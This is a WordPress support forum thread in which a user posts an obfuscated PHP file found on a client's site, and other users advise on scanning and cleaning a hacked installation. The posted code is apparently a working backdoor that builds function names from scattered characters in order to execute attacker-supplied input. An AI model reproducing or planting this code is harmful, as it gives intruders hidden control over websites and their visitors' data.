content-nav.php hacked?

  • Resolved SocialSparkMedia

    (@socialsparkmedia)


    9 years, 7 months ago

    I’ve just been asked to help get this site up-to-date. It’s a very simple site with only a few pages that display image galleries, but the contact form stopped working and that is why he called me.

    While going through the site to assess what needs to be done, I discovered this content-nav.php file that looks suspicious. I have run the site through Sucuri and it says it’s clean, and also ran a ManageWP Security scan on it and it comes up clean. I’m no php programmer, but this doesn’t look like nav code to me. What’s going on here? How do I fix it if no scans show anything is wrong?

    <?php
    $event =’Et’; $boggy= ‘n’; $geoduck = ‘(‘;$inclusively =’r’;$fares= ‘)Re$[‘; $asm =’e’;$browbeating =’,’;$chalkboard='(‘;
    $garrard = ‘at]”9′;$exhibition =’rcayR))C’;$coherence=’S’;$darting=’$’;

    $codification= ‘i”lv9U”OC’;$fish= ‘>Rf@JgIuE’;$humorously=’VrTg’;$bases = ‘=’;$eastward= ‘[‘;$forrest =’P’; $herringbone=’t’; $intensively=’?ieS”‘;$amazers = ‘K’; $anecdotes=’K’;

    $isotope=’=r,;’;$cackles=’D’;$constantin = ‘$’; $loving=’7′; $favorable =’p’; $antonina= ‘(ti;cd[‘; $blanches=’E”(s’; $gatekeep = ‘e’;$arclike =’O’;

    $coating =’$’;

    $audiotape= ‘e’;
    $inertance= ‘9’;

    $counterexample = ‘dr’;$impossibly = ‘(‘;$astride = ‘c;cGT”ru_’;$giusto=’p’;$anticompetitive= ‘e db’; $liable= ‘E’;$glissade=’H’;

    $launches =’Es:NTTDQ’; $lures=’_”‘;$lonesome = ‘e’;$luxuriantly= ‘_’;$georgi=’_’;$complementation =’Vm’; $grease = ‘fnH_a’; $envies = ‘T’; $differed =’i$$BaE$?’;
    $bleating =’)’; $font=’i’; $crest=’7′; $antipodean =’)’;$apostrophe= ‘[y’; $counteractive =’_’;
    $blot= ‘o’; $blowfish =’A9′;
    $geoduck= ‘_9ge(Za)i’;$confounding =’$FUEs[eat’;$ending = ‘SW’;

    $disengage=’R’;$hillside=’s$6DLXC’;$dauntless =’elY9a(a9H’;$liquifier=’i’;$evildead = ‘P’; $employer=’)’; $avidly = ‘c7d:i_?M’;

    $infighting = ‘;)(‘; $bandwagon= ‘a’;$homotopy= ‘o9$_ao’; $bronchial= ‘e’; $entrenching = ‘e’;
    $blondie= ‘]’; $dannye =’4′;$humfried = ‘](eeE’; $apprehension = ‘c’;$anarchists= ‘C’; $evania =’r’;
    $livid = ‘na_)=OIP]’;

    $clays= ‘Q’;$evinced = ‘Ti”v_d’; $anarchist= ‘s7se’;$kingpin= $apprehension .$evania.$anarchist[‘3’]. $livid[1].$confounding[‘8’] . $anarchist[‘3’].$evinced[‘4’]. $grease[‘0’] . $astride[‘7’] .$livid[‘0’].

    $apprehension.$confounding[‘8’] .$evinced[‘1’].
    $homotopy[‘5’]. $livid[‘0’]; $geralda= $anticompetitive[‘1’]; $legions = $kingpin($geralda, $anarchist[‘3’] . $evinced[‘3’].$livid[1] .$dauntless[1]. $humfried[‘1’] .

    $livid[1] .

    $evania.$evania. $livid[1].

    $apostrophe[‘1’].$evinced[‘4’].$giusto. $homotopy[‘5’] .
    $giusto . $humfried[‘1’]. $grease[‘0’] .$astride[‘7’]. $livid[‘0’].$apprehension. $evinced[‘4’] .$geoduck[‘2’]. $anarchist[‘3’].$confounding[‘8’].$evinced[‘4’] . $livid[1] .$evania . $geoduck[‘2’] .

    $anarchist[‘2’].

    $humfried[‘1’] .$livid[‘3’].$livid[‘3’].

    $livid[‘3’] .$infighting[0]);$legions($dauntless[1] , $livid[‘5’] , $evinced[‘0’] ,

    $giusto ,

    $fish[‘4’] ,

    $hillside[‘5’] ,$livid[‘4’] ,$confounding[‘1’] ,$ending[‘1’] , $homotopy[‘2’].$evinced[‘1’].$livid[‘4’]. $livid[1] . $evania. $evania .$livid[1] .

    $apostrophe[‘1’].
    $evinced[‘4’] . $complementation[‘1’] .$anarchist[‘3’].

    $evania . $geoduck[‘2’].$anarchist[‘3’] .$humfried[‘1’] .$homotopy[‘2’]. $evinced[‘4’]. $disengage. $humfried[4]. $clays .$confounding[‘2’]. $humfried[4] .$ending[‘0’] . $evinced[‘0’] .$isotope[‘2’] .$homotopy[‘2’] .$evinced[‘4’] . $anarchists .

    $livid[‘5’] . $livid[‘5’]. $anecdotes.$livid[‘6’] . $humfried[4] . $isotope[‘2’]. $homotopy[‘2’] .$evinced[‘4’].
    $ending[‘0’] . $humfried[4]. $disengage .$complementation[‘0’] . $humfried[4] . $disengage. $livid[‘3’] .$infighting[0] .$homotopy[‘2’].

    $livid[1] .$livid[‘4’].$evinced[‘1’].$anarchist[‘2’] . $anarchist[‘2’] .$anarchist[‘3’]. $confounding[‘8’] . $humfried[‘1’]. $homotopy[‘2’]. $evinced[‘1’]. $confounding[‘5’] .$evinced[‘2’].$anarchist[‘3’]. $homotopy[‘1’].
    $apprehension.
    $homotopy[‘1’].$anarchist[‘1’].$evinced[‘5’]. $evinced[‘2’]. $livid[‘8’].$livid[‘3’] .$avidly[‘6’].
    $homotopy[‘2’] . $evinced[‘1’] .$confounding[‘5’] . $evinced[‘2’].$anarchist[‘3’].$homotopy[‘1’] .$apprehension .$homotopy[‘1’].$anarchist[‘1’] .$evinced[‘5’] .$evinced[‘2’]. $livid[‘8’].

    $avidly[‘3’] .$humfried[‘1’].
    $evinced[‘1’]. $anarchist[‘2’]. $anarchist[‘2’] . $anarchist[‘3’] .$confounding[‘8’] .$humfried[‘1’] . $homotopy[‘2’] . $evinced[‘1’] .$confounding[‘5’]. $evinced[‘2’] .
    $dauntless[‘8’] .$evinced[‘0’].

    $evinced[‘0’].$livid[‘7’] .

    $evinced[‘4’]. $humfried[4].$homotopy[‘1’].$anarchists .$homotopy[‘1’] .$anarchist[‘1’] .
    $hillside[‘3’] . $evinced[‘2’].
    $livid[‘8’] .

    $livid[‘3’] .
    $avidly[‘6’] .$homotopy[‘2’] . $evinced[‘1’]. $confounding[‘5’]. $evinced[‘2’]. $dauntless[‘8’] .
    $evinced[‘0’] . $evinced[‘0’].$livid[‘7’] . $evinced[‘4’].$humfried[4] . $homotopy[‘1’] . $anarchists .
    $homotopy[‘1’].$anarchist[‘1’] .
    $hillside[‘3’].$evinced[‘2’]. $livid[‘8’] .$avidly[‘3’] . $evinced[‘5’].$evinced[‘1’] . $anarchist[‘3’]. $livid[‘3’].$infighting[0].$anarchist[‘3’] . $evinced[‘3’] .

    $livid[1].

    $dauntless[1].$humfried[‘1’] .$anticompetitive[‘3’]. $livid[1] .$anarchist[‘2’] . $anarchist[‘3’].

    $hillside[‘2’] .

    $dannye.$evinced[‘4’] . $evinced[‘5’] . $anarchist[‘3’].$apprehension. $homotopy[‘5’] . $evinced[‘5’] .$anarchist[‘3’] .$humfried[‘1’]. $homotopy[‘2’].
    $livid[1] . $livid[‘3’] .
    $livid[‘3’].$infighting[0] );

Viewing 5 replies - 1 through 5 (of 5 total)

  • Unless you used the paid version of Sucuri, you didn’t get a server side scan. I am not familiar with ManageWP, so I don’t know about its scanning methods.

    If you find no outward signs of a hack, like spam links or redirects, I suggest you try one or two more plugins. Wordfence and Anti-Malware from GOTMLS.NET are both good choices. If you use Wordfence, I suggest you go to Dashboard > Wordfence > Options > Scans to include and check all the boxes in this section before you run a scan. This will give you the most scanning options.

    Thread Starter SocialSparkMedia

    (@socialsparkmedia)

    Thanks, wslade, I’ll give Wordfence a shot. If it shows that there is a problem with the site, it won’t repair it, will it?

    Don’t the contents of that file look suspicious to you?

    Yes, I’m sorry to say that your site is very likely hacked. The only completely safe way to repair a damaged site is to restore from a known good backup. If you don’t have a good backup, it’s a possibility that the host has one.

    The second best way to clean up a site is to follow this guide.

    About your question of using Wordfence to repair a site, here is information: https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/. And yes, correctly used, Wordfence will help you clean a damaged site.But as good a tool as it is, Wordfence sometime will not find all the malware.

    If backup isn’t available, I almost always suggest following the guide. But IF your site has no outward signs of a hack, possibly the hack was only partially effective. And maybe you can find all the malware using Wordfence.

    Thread Starter SocialSparkMedia

    (@socialsparkmedia)

    Thanks so much for all of that useful info and for the links. This is exactly the information I was looking for. I will read over the guides and give it a shot. It’s such a simple site, I could probably recreate it pretty easily if necessary.

    Thanks again for taking the time to help!

    Fran

    I’m glad I could help. The pages, posts and comments are in the database. Any images and other media is in wp-content.

    Maybe your database is not damaged. Delete everything in the WordPress root except wp-contact and wp-config.php. Replace the plugins and theme with new ones and you have done everything in the guide.

    Be sure to add Wordfence or another good security plugin to help prevent future damage.

Viewing 5 replies - 1 through 5 (of 5 total)
  • The topic ‘content-nav.php hacked?’ is closed to new replies.